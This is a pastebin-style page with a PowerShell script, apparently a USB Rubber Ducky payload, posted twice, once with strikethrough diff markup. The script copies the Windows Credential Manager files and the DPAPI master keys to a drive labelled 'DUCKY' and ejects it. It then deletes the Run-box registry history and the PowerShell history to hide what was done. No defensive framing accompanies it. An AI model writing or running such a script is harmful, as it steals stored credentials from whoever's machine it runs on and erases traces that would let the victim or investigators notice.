Re: Untitled

# Variables
$drive = (Get-Volume -FileSystemLabel ~~'DUCKY').~~'DUCKY').DriveLetter
$userProfile = $Env:UserProfile

# Get the credential files
$credentialFiles = @(Get-ChildItem -Force ~~"${userProfile}AppDataLocalMicrosoftCredentials")~~

"${userProfile}\AppData\Local\Microsoft\Credentials\")

# Get the first credential file for now
$credentialFileName = $credentialFiles[0].Name
$credentialFilePath = $credentialFiles[0].FullName

# Copy to ducky
Copy-Item $credentialFilePath ~~"${drive}:${credentialFileName}"~~

"${drive}:\${credentialFileName}"

# Get the gUIDMasterKey
$protectFolder = (Get-ChildItem -Directory -Force ~~"${userProfile}AppDataRoamingMicrosoftProtect").~~"${userProfile}\AppData\Roaming\Microsoft\Protect\").FullName

# Copy master key to ducky
Get-ChildItem -Force -Recurse $protectFolder | ForEach-Object {
    $fileName = $_.Name
    $filePath = $_.FullName
    Copy-Item $filePath ~~"${drive}:${fileName}"~~
"${drive}:\${fileName}"
}

# Eject
$driveEject = New-Object -ComObject Shell.Application
$driveEject.Namespace(17).~~ParseName("${drive}:").InvokeVerb("Eject")~~

ParseName("${drive}:").InvokeVerb("Eject")

# Cleanup traces

# Delete run box history
reg.exe delete ~~HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerRunMRU~~ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f

# Delete Powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath

exit

Title	Name	Language	UNIX	When
Re: Re: Untitled	advdadf	powershell	1715916287	1 Month ago.

Author

Title

Language

Your paste - Paste your paste here

# Variables
$drive = (Get-Volume -FileSystemLabel 'DUCKY').DriveLetter
$userProfile = $Env:UserProfile

# Get the credential files
$credentialFiles = @(Get-ChildItem -Force &quot;${userProfile}\AppData\Local\Microsoft\Credentials\&quot;)

# Get the first credential file for now
$credentialFileName = $credentialFiles[0].Name
$credentialFilePath = $credentialFiles[0].FullName

# Copy to ducky
Copy-Item $credentialFilePath &quot;${drive}:\${credentialFileName}&quot;

# Get the gUIDMasterKey
$protectFolder = (Get-ChildItem -Directory -Force &quot;${userProfile}\AppData\Roaming\Microsoft\Protect\&quot;).FullName

# Copy master key to ducky
Get-ChildItem -Force -Recurse $protectFolder | ForEach-Object {
    $fileName = $_.Name
    $filePath = $_.FullName
    Copy-Item $filePath &quot;${drive}:\${fileName}&quot;
}

# Eject
$driveEject = New-Object -ComObject Shell.Application
$driveEject.Namespace(17).ParseName(&quot;${drive}:&quot;).InvokeVerb(&quot;Eject&quot;)

# Cleanup traces

# Delete run box history
reg.exe delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f

# Delete Powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath

exit

Private - Private paste aren't shown in recent listings.

Delete After - When should we delete your paste?

Spam protection -

Replies to Re: Untitled

Reply to "Re: Untitled"